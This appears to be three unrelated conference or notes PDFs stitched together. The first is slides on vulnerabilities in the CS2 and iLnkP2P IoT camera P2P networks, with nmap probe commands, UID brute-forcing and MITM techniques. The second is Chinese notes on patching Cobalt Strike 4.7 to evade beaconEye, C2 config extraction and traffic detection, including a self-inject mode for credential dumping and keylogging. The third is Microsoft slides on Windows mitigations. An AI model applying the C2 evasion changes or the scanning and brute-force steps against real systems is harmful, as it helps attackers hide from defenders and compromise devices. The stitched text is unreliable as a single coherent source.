• Several different providers of P2P soluEons in the industry
• Largest is probably ThroughTek (TUTK)'s Kalay plaWorm (> 66m devices1)
• This talk will focus on 2 in parEcular:
• CS2 Network P2P (> 50m devices2)
• Libs: PPPP_API, PPCS_API, libPPPP_API, libPPCS_API
• Shenzhen Yunni iLnkP2P (>3.6m devices)
• FuncEonally-idenEcal clone of CS2 P2P (even has compaEble API)
• Libs: libxqun, libXQP2P_API, libobject, PPPP_API
1: https://www.throughtek.com/kalay_structure.html
2: http://cs2-network.cn/iot/about/slide/slide.php?slide=1
What are the risks of P2P?
• P2P, by design, is meant to expose devices
• In many cases, no way to turn it off
• You can obtain direct access to any device if you have its UID (unique identifier)
• Devices are usually ARM-based, running BusyBox with everything as root
• What could *possibly* go wrong? 🤔
• Tired: Eavesdropping, data theft, disabling security systems
• Wired: Pre-auth RCE on millions of devices 👀💦
Anatomy of a P2P Network
P2P Servers
• Our gateway to millions of devices
• Manage all devices in the network
• Orchestrate connections between clients and devices
• Essentially C&C servers
• Owned and operated by device manufacturers
• Often hosted using Alibaba cloud or AWS (usually in sets of 3 for redundancy)
• Listens on UDP port 32100
• Hundreds of these on the Internet
Devices
• All have their own unique idenEfier (UID)
• Key concept: used for connecEng to the device
• i.e., users don't directly use IP addresses
• Should be considered "sensiEve"
• Anyone who knows the UID can connect
• Generated by P2P provider and provided to device
manufacturer
• Wri=en to device NVRAM during manufacturing, someEmes printed on label
Device UID
• Prefix: Used for vendor/product grouping (up to 8 letters)
• Vendor may have several (e.g. DEFA, DEFB, DEFC)
• Vendor's P2P server will only support their specific prefixes
• Serial Number: Device identifier (typically 6-7 digits)
• Sequentially generated
• Check Code: Used to protect UIDs and prevent spoofing (5-8 letters)
• Security feature
• Generated using secret algorithm by the P2P provider
DEFC-000123-HAXME
Prefix
Serial Number
Check Code
Client
• Desktop/mobile app for connecEng to device
• User enters UID in client, client sends connecEon request
to the P2P servers
Protocol
• Entirely UDP
• Control messages to establish connections
• "DRW" (device read/write) messages wrap application data (e.g. video, audio)
• Guarantees both order and delivery despite being UDP
• Most messages are just packed C structs with a 4-byte header
• Magic number (always 0xF1), message type (uint8), payload length (uint16)
• Developed Wireshark dissector to aid with reversing and traffic analysis
Wireshark P2P dissector
Connecting to Devices
(or, how to punch through firewalls)
UDP hole punching
• A technique to establish direct connections even with NAT/firewalls
• Takes advantage of how NAT creates inbound rules based on outbound packets
• For example: if we make a DNS request, the router needs to create a rule so the response
gets back to us
• If we have a target IP and port, we can create a rule by sending a packet there
• But how do we know the peer's IP and port if we can't talk to them?
• We can use the P2P server to exchange address information!
• Both sides can then send packets to each other, which creates rules in their respective NATs
to let packets from the other side through
• Why yes, this *is* very similar to STUN!
UDP hole punching
UDP hole punching
UDP hole punching
UDP hole punching
Relayed connections
• UDP hole punching doesn’t always work
• As a fallback, peers can talk through a "relay server":
• If both sides can connect to the same relay, it can proxy traffic between them
Superdevices
• Devices that act as relays to support the network
• Users have no way to opt out of this (hope you don’t have bandwidth quotas!)
• Sketchy, but not actually uncommon in P2P architectures (supernodes)
• Spoiler alert: we're going to have fun with these. 😈
Hun:ng for Devices
Finding P2P Servers
• Desktop and phone apps are one way to find P2P server addresses
• More efficient: nmap UDP probes on cloud provider IP ranges!
• Send hello message (0xf1000000) to UDP port 32100
• Valid P2P servers will respond with ACK message (0xf1010000)
• Add udp 32100 "\xf1\x00\x00\x00" to /usr/share/nmap/payloads
• nmap -n -sn -PU32100 --open -iL ranges.txt
• 618 confirmed P2P servers discovered as of July 2020
• Discrepancies in responses allowed a fingerprinting technique to be developed
• 86% are CS2, 14% are iLnkP2P
Finding Prefixes
• To use P2P servers, we need to find out which prefixes they support
• Again, desktop and phone apps are one way to find prefixes
• Also, Amazon reviews…
Finding Prefixes
Finding Prefixes
Invalid prefix (0xFD)
Invalid UID, valid prefix (0xFF)
Request:
Response:
Finding Prefixes
Finding Prefixes
• Can infer validity of prefix from server response code
• 0xFD: Invalid prefix
• 0xFF: Valid prefix but invalid serial / check code
• Can brute force all 3-letter combinations in ~1hr, 4 letter in ~36hrs
• No rate limiting!
• Discovered 488 distinct prefixes on 487 P2P servers as of July 2020
• Average is 4 per server, but some servers support >130 prefixes
Finding UIDs
• We have prefixes, we can easily infer serial numbers (sequential numbers)
• The problem is now the check code:
• Exists to stop precisely this sort of attack
• If the UID is DEFC-000123-HAXME, DEFC-000123-HAXMF will not work
• Keyspace makes brute forcing impractical
• How can we get around this?
Predictable iLnkP2P UIDs (CVE-2019-11219)
• Some iLnkP2P libraries shipped with their secret check code algorithm
• Uses modified MD5; the check code is the le=ers from the resulEng hash (i.e. A-F)
• Apparently included to validate UIDs, even though the server already does that 🤷
• We can now connect to any device that uses iLnkP2P
Predictable iLnkP2P UIDs (CVE-2019-11219)
Predictable iLnkP2P UIDs (CVE-2019-11219)
• Over 3.6 million devices as of July 2020, many of which use default passwords
• Disclosed to Shenzhen Yunni Technology in February 2019
• No response despite several attempts
• New iLnkP2P UIDs are still being issued today
• Does not affect CS2… but more on that later.
Exploiting Devices
(or, how to shoot fish in a barrel)
Let's find some camera vulns!
• Shenzhen Hichip Vision Technology, Co.
• Major manufacturer, worldwide market (ODM)
• Used by a huge number of OEMs
• OEMs buy from Hichip and add their own branding
• Can easily identify OEMs by their use of the "CamHi" app
• At least 50 P2P servers and 29 prefixes
• 2.95 million (81%) of the iLnkP2P devices I've found have been Hichip
OEMs using Hichip
Accfly
Dericam
ICAMI
Nettoly
ThinkValue
Alptop
Elex System
ieGeek
OWSOO
THOMSON
Anlink
Elite Security
Jecurity
PNI
TOMLOV
Avidsen
ENSTER
Jennov
ProElite
TonTon Security
Besdersec
ePGes
KKMoon
QZT
TPTEK
BOAVISION
Escam
LEFTEK
Royallite
Wanscam
COOAU
FLOUREON
Loosafe
SDETER
WGCC
CPVAN
GatoCam
Luowice
SV3C
WYJW
Ctronics
GENBOLT
MEOBHI
SY2L
ZILINK
D3D Security
Hongjingtian (HJT)
Nesuniq
Tenvis
Zysecurity
Hunting for vulnerabilities
• Obtained firmware samples from reseller sites (often just a ZIP file, easy to analyze)
• HI_P2P_Cmd_ReadRequest handles commands received over P2P
• Used for everything including login; you don't need auth to hit this function
Hunting for vulnerabilities
Hunting for vulnerabilities
Pre-auth remote code execution (CVE-2020-9527)
Pre-auth remote code execution (CVE-2020-9527)
Pre-auth remote code execution (CVE-2020-9527)
Pre-auth remote code execution (CVE-2020-9527)
Pre-auth remote code execution (CVE-2020-9527)
Pre-auth remote code execution (CVE-2020-9527)
• Buffer overflow in login routine allows remote execution of arbitrary code
• If you have a vulnerable device’s UID, you can get a shell!
• Binaries compiled without ASLR/PIE/stack canaries
• Offsets vary between versions, but very reliable code execution
• Affects firmware from August 2018 through June 2020
Password reset via LAN (CVE-2020-9529)
• Affects all firmware prior to June 2020
Abusing P2P to Conduct
Man-in-the-Middle Attacks
Over-the-Internet MITM
• P2P servers coordinate all connections
• If we can influence that, man-in-the-middle may be possible
• Can be done over-the-Internet, not restricted to local network
• The P2P layer offers no effective protection of session data
• Application is entirely responsible for security
• Most do not employ encryption at all, or do so in an insecure fashion
Over-the-Internet MITM
Over-the-Internet MITM
• Devices regularly log in to P2P servers
• Server takes note of message origin (IP and UDP port)
• When a client requests a connection, servers tell client to punch to that address
• This login messages contains just the UID -- no device-specific secret
• If we possess a UID, we can forge this message to confuse the server
• The user will connect to us and authenticate without hesitation…
Over-the-Internet MITM
• CS2 sometimes "encrypts" the login message…
• MSG_DEV_LGN_CRC instead of MSG_DEV_LGN
• Proprietary symmetric cipher; vendor sets a "CRC key" for their P2P server
• All their devices need to ship with that key (i.e. accessible in firmware)
• Some servers allow logging in without the key anyway 🤪
• Affects iLnkP2P (CVE-2019-11220) and CS2 (CVE-2020-9525)
• No response from Shenzhen Yunni
• CS2 states new version 4.0 will fix this
Over-the-Internet MITM
Passive over-the-Internet MITM
• Active attack requires a UID, knowledge of protocol, timing, etc...
• Instead of targeting devices, let the devices come to us.
• Remember superdevices?
• Devices that relay sessions for other users
• Most vendors use these to support their network
• The P2P layer does not securely encrypt relayed traffic
• The application traffic is typically not encrypted either…
Passive over-the-Internet MITM
This means anyone can buy a device
and access other people’s traffic.
Passive over-the-Internet MITM
• With gentle PCAP parsing, can actually stream packets straight into ffplay
• Users have no way of knowing whether their connection is being intercepted
• Bonus! UIDs are leaked during the P2P handshake
• Exploited this to collect over 236,000 unique CS2 UIDs in 10 months
• Affects iLnkP2P and CS2 (CVE-2020-9526)
• CS2 states new version 4.0 will fix this
Passive over-the-Internet MITM
Demo time!
Final Thoughts
Patching
CVE
Vendor / Product
Vulnerability
Status
CVE-2019-11219
Yunni iLnkP2P
UID enumeration
Unpatched
CVE-2019-11220
Yunni iLnkP2P
Device spoofing (MITM)
Unpatched
CVE-2020-9525
CS2 Network P2P
Device spoofing (MITM)
Patch pending (v4.0)
CVE-2020-9526
CS2 Network P2P
Data leakage in superdevice Patch pending (v4.0)
CVE-2020-9527
Hichip
Buffer overflow
Patched (June 2020)
CVE-2020-9528
Hichip
Cryptographic weaknesses
Patched (June 2020)
CVE-2020-9529
Hichip
Password reset via LAN
Patched (June 2020)
A bleak outlook
• No hope for some of these issues being fixed retroactively
• Fundamental flaws with no chance of backwards compatibility
• Doesn't really matter. Users don't update -- some firmware versions go back to 2015!!
• Sellers won't pull defective products1
• Amazon: No comment received
• eBay: "These devices can be used safely if used in a network without an internet
connection" 🙄 🙄 🙄
1: https://www.which.co.uk/news/2020/06/more-than-100000-wireless-security-cameras-in-the-uk-at-risk-of-being-hacked/
Further research
• More device-specific vulnerabilities exploitable through P2P
• Other P2P platforms (e.g. Wyze uses ThroughTek Kalay)
• Other large device manufacturers
• Higher up the supply chain in general!
Reversing tips
• Samples, samples, samples!! Never too many.
• APKs: Java decompiles into beautiful, readable code (check out JADX!)
• Throw every single interesting filename or magic string you find into GitHub
• May reveal SDKs, docs, client source, even firmware source
References
• Balazs, Zoltan. “IoT Security Is a Nightmare. But What Is the Real Risk?,” August 21, 2016.
https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
• Serper, Amit. “Zero-Day Exploits Could Turn Hundreds of Thousands of IP Cameras into IoT
Botnet Slaves,” December 6, 2016.
https://www.cybereason.com/blog/zero-day-exploits-turn-hundreds-of-thousands-of-ip-cameras-into-iot-botnet-slaves
• Kim, Pierre. “Multiple Vulnerabilities Found in Wireless IP Camera (P2P) WIFICAM Cameras
and Vulnerabilities in Custom HTTP Server,” March 8, 2017.
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
• Martin, Balthasar, and Bräunlein, Fabian. "Next-Gen Mirai," November 16, 2017.
https://srlabs.de/wp-content/uploads/2017/11/Next-Gen_Mirai.pdf
• Viehböck, Stefan. "Millions of Xiongmai Video Surveillance Devices Can be Hacked via Cloud
Feature (XMEye P2P Cloud)," October 9, 2018.
https://sec-consult.com/en/blog/2018/10/millions-of-xiongmai-video-surveillance-devices-can-be-hacked-via-cloud-feature-xmeye-p2p-cloud
Thank you!
@PaulMarrapese
[email protected]
https://hacked.camera | pdf |
1
IceRiver⾼版本Q.V⼆开记录
特性清单
详细信息
修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据,规避爆破脚本扫描
修改beacon配置信息的默认XOR密钥,⼀定程度上规避⾃动化提取CO配置信息
修改配置数据所在堆块的默认值,规避beaconEye扫描
修改HTTP ua头,⼀定程度上规避全流量检测
增加beacon数量统计,⽅便统计战果
self inject模式
客户端内置winvnc,避免在TeamServer端上传winvnc dll,⽅便使⽤
修改默认保存的客户端配置⽂件名,加密保存登录密码,避免被明⽂读取
Change Log
修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据,规避爆破脚本扫描
修改beacon配置信息的默认XOR密钥,⼀定程度上规避⾃动化提取C2配置信息
修改配置数据所在堆块的默认值,规避beaconEye扫描
修改HTTP ua头,⼀定程度上规避全流量检测
增加beacon数量统计,⽅便统计战果
self inject模式,通过注⼊beacon⾃⼰规避杀软对注⼊傀儡进程的拦截,可规避部分杀软的查杀,⽀
持模块:Screenshot,Screenwatch,
Hashdump,Desktop,Printscreen,ChromeDump,PassTheHash(pth),DcSync,LogonPasswords,Net
View(net),KeyLogger,PortScan,PowerShell(powerpick),SSHAgent(ssh,ssh-key),加⼊⽀持第三⽅
插件的⾃身注⼊。
客户端内置winvnc,避免在TeamServer端上传winvnc dll,⽅便使⽤
修改默认保存的客户端配置⽂件名,加密保存登录密码,避免被明⽂读取
特性清单
●
●
●
●
●
●
●
●
详细信息
2
从4.4版本的TeamServer java代码中,可以知道header头和返回验证成功数据。
IDA中搜索 48879,定位到位置在 1D5D7B2
位置在 1D5DF0E
分别修改为需要的header值即可,需要注意的是不能出现nop指令。
修改默认登录认证的header标志位数据和验证成功的返回数据头部标志数据,
规避爆破脚本扫描
修改beacon配置信息的默认XOR密钥,⼀定程度上规避⾃动化提取C2配置信息
3
修改⽂件清单:
beacon.dll/beacon.rl100k.dll
beacon.x64.dll/beacon.x64.rl100k.dll
dnsb.dll/dnsb.rl100k.dll
dnsb.x64.dll/dnsb.x64.rl100k.dll
extc2.dll/extc2.rl100k.dll
extc2.x64.dll/extc2.x64.rl100k.dll
pivot.dll/pivot.rl100k.dll
pivot.x64.dll/pivot.x64.rl100k.dll
sshagent.dll/sshagent.x64.dll
在解密配置信息函数(fdReason == 1)当中可以看到异或0x2E的操作,这⾥只需要改默认密钥0x2E即
可,同时修改客户端代码beacon/BeaconPayload.java中的beacon_obfuscate函数⾥的异或密钥,与
beacon端保持⼀致。
修改⽂件清单:
beacon.dll/beacon.rl100k.dll
beacon.x64.dll/beacon.x64.rl100k.dll
dnsb.dll/dnsb.rl100k.dll
dnsb.x64.dll/dnsb.x64.rl100k.dll
●
●
●
●
●
●
●
●
●
修改配置数据所在堆块的默认值,规避beaconEye扫描
●
●
●
●
4
extc2.dll/extc2.rl100k.dll
extc2.x64.dll/extc2.x64.rl100k.dll
pivot.dll/pivot.rl100k.dll
pivot.x64.dll/pivot.x64.rl100k.dll
sshagent.dll/sshagent.x64.dll
在申请保存配置信息(fdReason == 1)的堆内存数据时,默认使⽤的0值对堆进⾏初始化,这⾥只需要
将0值改为⾮0即可绕过beaconEye扫描。
python/java/php/go/curl/wget/windows/linux/mac
●
●
●
●
●
修改HTTP ua头,⼀定程度上规避全流量检测
5
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/
99.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:77.0) Gecko/20100101 Firefox/77.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/75.0
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20191022 Firefox/70.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20190101 Firefox/70.0
Mozilla/5.0 (Windows; U; Windows NT 9.1; en-US; rv:12.9.1.11) Gecko/201008
21 Firefox/70
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:69.2.1) Gecko/20100101 Firefox/69.
2
Mozilla/5.0 (Windows NT 6.1; rv:68.7) Gecko/20100101 Firefox/68.7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Mozilla/5.0 (Windows NT 6.2; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Firefox/58.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/58.0
Mozilla/5.0 (Windows NT 5.0; Windows NT 5.1; Windows NT 6.0; Windows NT 6.
1; Linux; es-VE; rv:52.9.0) Gecko/20100101 Firefox/52.9.0
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/5
2.59.12
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20120121 Firefox/46.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.66.18) Gecko/20177177 Firefox/4
5.66.18
Mozilla/5.0 (Windows NT 9.2; Win64; x64; rv:43.43.2) Gecko/20100101 Firefo
x/43.43.2
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0
Mozilla/5.0 (Windows ME 4.9; rv:31.0) Gecko/20100101 Firefox/31.7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/3
1.0
Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/2
9.0
Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/2
7.0
Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/2
5.0
Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Bash
复制代码
6
在aggressor/browsers/Sessions.java中的getContent函数最后,添加以下代码即可。
增加beacon数量统计,⽅便统计战果
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firef
ox/24.0
Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/2
3.0
Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/2
2.0
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Fir
efox/22.0
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefo
x/21.0.1
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefo
x/21.0.1
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefo
x/21.0.0
Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0
Mozilla/5.0 (Windows x86; rv:19.0) Gecko/20100101 Firefox/19.0
Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0
Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
python-requests/2.25
Java/1.8.0_232
curl/7.54
Go-http-client/1.1
Wget/3.4.1
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
7
由于需要保证java 类的hash id计算保持⼀致,所以不能像4.4那样在BeaconEntry类当中新增属性字段,
这⾥采⽤添加类变量的⽅式,以hashmap的形势存储每个beaconEntry的配置信息,这样的好处是,不
self inject模式
JPanel mainPanel = new JPanel();
mainPanel.setLayout(new BorderLayout());
Box verticalBox = Box.createVerticalBox();
Box horizontalBox = Box.createHorizontalBox();
JPanel totalBeacon = new JPanel();
totalBeacon.setLayout(new BorderLayout());
horizontalBox.add(new JLabel("Total Beacons: "));
JLabel totalBeaconView = new JLabel(String.valueOf(this.model.getRowCount(
)));
this.table.getModel().addTableModelListener((tableModelEvent) -> {
totalBeaconView.setText(String.valueOf(this.model.getRowCount()));
});
horizontalBox.add(totalBeaconView);
totalBeacon.setMaximumSize(new Dimension(220, 100));
totalBeacon.add(horizontalBox, "North");
verticalBox.add(totalBeacon);
verticalBox.add(DialogUtils.FilterAndScroll(this.table));
mainPanel.add(verticalBox);
return mainPanel;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Java
复制代码
8
会影响团队内其他⽤户的操作,代码具体如下:
在aggressor/browsers/Sessions.java的cols中添加inject,这⾥⽤来在⻚⾯上展示inject字段。
在common/BeaconEntry.java中添加类变量injectMode和函数getInject、setLessInject、
setFullInject、setDefaultInject,⽤来保存当前beacon的配置以及切换配置。
其他修改与4.4版本原理⼀致,不再详述。启⽤SelfInject模式后,提示信息将会更换为“IceRiver By
Attack2Defense <CobaltStrike 4.7> Self Inject”开头的信息。
9
对第三⽅⾃定义插件的SelfInject⽀持,还在实现当中。
这⾥CS 4.7的设计存在缺陷,在执⾏Desktop任务时,会先发送aggressor.resource指令到
teamserver,由teamserver读取服务器上的third-party⽬录下的winvnc.arch.dll⽂件内容,再返回给客
户端做RDI处理,然后再由客户端构造inject还是spawn指令发送到teamserver端。
改造后就⽐较直接了,直接从客户端的resources⽬录读取dll,构造命令,再发送到teamserver。
客户端内置winvnc,避免在TeamServer端上传winvnc dll,⽅便使⽤
10
修改aggressor/Prefs.java中的原.aggressor.prop⽂件名以及resources/aggressor.prop名称。
修改默认保存的客户端配置⽂件名,加密保存登录密码,避免被明⽂读取
11
保存密码和读取密码时,使⽤随机⽣成的aes密钥加密和解密。在aggressor/Prefs.java的getString和
set⽅法中添加过滤,如果是保存和修改密码,则在保存前和读取后执⾏加密和解密。
加密解密使⽤的是对称加密算法AES CTR,因此获取客户端⾃带的key和iv,就可以对密⽂解密。
12
Change Log | pdf |
Bluehat Shanghai 2019 |
David “dwizzzle” Weston |
Microsoft OS Security Group Manager
Advancing Windows Security
早上好 上海!
Windows for PCs
Familiar desktop experience
Broad hardware ecosystem
Desktop app compat
One Core OS
Base OS
App and Device Platform
Runtimes and Frameworks
Windows on XBOX
10 Shell experience
Unique security model
Shared gaming experience
Windows on IOT
Base OS
App and Device Platform
Runtimes and Frameworks
Windows for …
Form factor appropriate
shell experience
Device specific scenario
support
Windows is evolving….
Malicious code
cannot persist on a
device.
Violations of
promises are
observable.
All apps and
system
components have
only the privilege
they need.
All code executes
with integrity.
User identities
cannot be
compromised,
spoofed, or stolen.
Attacker with
casual physical
access cannot
modify data or
code on the device.
Increasing Security
Windows 10 S
10 S
Classic
2
1
Mandatory Code Signing
Complete Password-less
“Admin-less” user account
4
3
Internet scripts and macros
blocked
1
Run as admin
2
Execute Unsigned Code
3
Use passwords
4
Mitigations not always on
10 S: Millions of installs, no widespread detections of malware
All code executes with integrity.
Code Integrity Improvements
CI policy removes many “proxy” binaries
Store signed only apps (UWP or Centennial)
“Remote” file extensions that support dangerous actions are blocked
Remote Office Macros are blocked by default
Windows 10 S
All binaries
Microsoft Signed
Proxy Binaries
Dangerous
Handlers
Remote
Dangerous
Files
1st Order Code Integrity protection
A “1st order” CI bypass enables a remote attack to
trigger initial unsigned code execution
10 S focuses on preventing “1st” order bypasses
A “2nd order” bypass enabled additional unsigned code
execution after reaching initial code execution
10 S offers less durable guarantees for “2nd” order
bypasses
Windows 10 S
Network
Physical Machine
Trigger
Handler
No
Yes
Exploit mitigation Strategy
Increase Cost of
Exploitation
Control Flow
Integrity
Signed Code Only
Read-only Data
Eliminate bug classes
Control Flow Challenges
Dangerous call
targets
Unprotected
Stack
Data
corruption
1
2
3
((void(*)(int, int)) funcptr)(0, 1);
obj->method1();
void function_A(int, int) { ... }
int
function_B(int, int) { ... }
void function_C(Object*)
{ ... }
void Object::method1()
{ ... }
void Object::method1(int, int) { ... }
void Object::method2()
{ ... }
void Object2::method1()
{ ... }
Call sites
Call Targets
CFG
First generation CFI in Windows, coarse grained for compatibility and performance
“Export suppression” used to reduce number of call sites in specific processes (example: Microsoft Edge)
Improving Control Flow Integrity
Introducing: XFG
Goal: Provide finer-grained CFI in a way that is efficient and compatible
Concept: restrict indirect transfers through type signature checks
((void(*)(int, int)) funcptr)(0, 1);
obj->method1();
void function_A(int, int) { ... }
int
function_B(int, int) { ... }
void function_C(Object*)
{ ... }
void Object::method1()
{ ... }
void Object::method1(int, int) { ... }
void Object::method2()
{ ... }
void Object2::method1()
{ ... }
Call Sites
Call Targets
Improving Control Flow Integrity
XFG design: basics
Assign a type signature based tag to each address-taken function
For C-style functions, could be:
hash(type(return_value), type(arg1), type(arg2), ...)
For C++ virtual methods, could be:
hash(method_name, type(retval), highest_parent_with_method(type(this), method_name), type(arg1), type(arg2), ...)
Embed that tag immediately before each function so it can be accessed through function pointer
Add tag check to call-sites: fast fail if we run into a tag mismatch
Improving Control Flow Integrity
mov
rax, [rsi+0x98]
; load target address
call [__guard_dispatch_icall_fptr]
.align 0x10
function:
push rbp
push rbx
push rsi
...
mov
rax, [rsi+0x98]
; load target address
mov
r10, 0xdeadbeefdeadbeef
; load function tag
call [__guard_dispatch_icall_fptr_xfg] ; will check tag
.align 0x10
dq 0xcccccccccccccccc ; just alignment
dq 0xdeadbeefdeadbeef ; function tag
function:
push rbp
push rbx
push rsi
...
CFG instrumentation: Call Site
xFG instrumentation : Call Site
Target
Target
XFG Security
C-style function pointers can only call address-taken functions with same type signature
Call-site and targets have same number of arguments, arguments and return value have same types
C++ virtual methods can only call methods with same name and type in their class hierarchy
Can’t call wrong-type overload methods
Can’t call methods from other class hierarchies
Can’t call differently-named methods with same type in same hierarchy
This is much stronger than CFG, although it is an over-approximation
It should be noted that the use of a hash function means there could technically be collisions, but that is very unlikely (especially in a useful way) on a ~55 bit hash
Improving Control Flow Integrity
Control Flow Challenges
Dangerous call
targets
Unprotected
Stack
Data
corruption
1
2
3
Shadow Stack Protection
Initial attempt to implement stack protection in software failed
OSR designed software shadow stack (RFG) did not survive internal offensive
research
Control-flow Enforcement Technology (CET)
Return address protection via a shadow stack
Hardware-assists for helping to mitigate control-flow hijacking & ROP
Robust against our threat model (assume arbitrary RW)
Rearward Control Flow
CET Shadow Stack Flow:
Call pushes return address on both stacks
Ret/ret_imm
pops return address from both stack
Execption if the return addresses don’t match
No parameters passing on shadow stack
Return EIPn-1
Param 1
Param 2
Return EIPn
Return EIPn-1
Return EIPn
Stack usage on near CALL
ESP
after
call
SSP
after
call
+0
+4
Control Flow Integrity Challenges
Dangerous call
targets
Unprotected
Stack
Data
corruption
1
2
3
Introducing: Kernel Data Protection
Problem: Kernel exploits in Windows leverage
data corruption to obtain privilege escalation
Current State: Hypervisor-based code integrity
prevents dynamic code injection and enforces
signing policy
Prevent code is not enough, kernel has many
sensitive data structures
Kernel Data Protection (KDP) uses Secure Kernel
to enforce immutability
Data Corruption Protection
CVE-2016-7256 exploit: Open type font elevation of privilege
Corrupting Code Integrity Globals (credit: FuzzySec)
Data Corruption Protection
Admin
Static Data
Dynamic Data
VBOX
Capcom
CPU-Z
Attacker Process
NTSTATUS MmProtectDriver (
_In_ PVOID AddressWithinSection,
_In_ ULONG Size,
_In_opt_ ULONG Flags);
Kernel Data Protection:
Mechanism to perform read-only pool allocations
RO PTE Hypervisor Protected when VBS is enabled
Validation mechanism to allow callers to detect whether
the memory they’re referencing is protected pool allocation
All apps and system components have only
the privilege they need
Introducing: Admin-less
Elevation is been blocked Admin-less S mode
New Standard user type can make some
device-wide changes
Kernel Data Protection (KDP) uses Secure Kernel
to enforce immutability
“Admin-less” Mode
Malicious code cannot persist on a device.
Firmware Security Issues
ESET discovers SEDNIT/APT28 UEFI malware
SMM attacks to bypass VBS
“ThinkPWN” exploit of Lenovo firmware
System Guard with DRTM
Utilize DRTM (Intel, AMD, QC) to perform TCB measurements from a Microsoft
MLE
“Assume Breach” of UEFI and measure/seal critical code and data from hardware
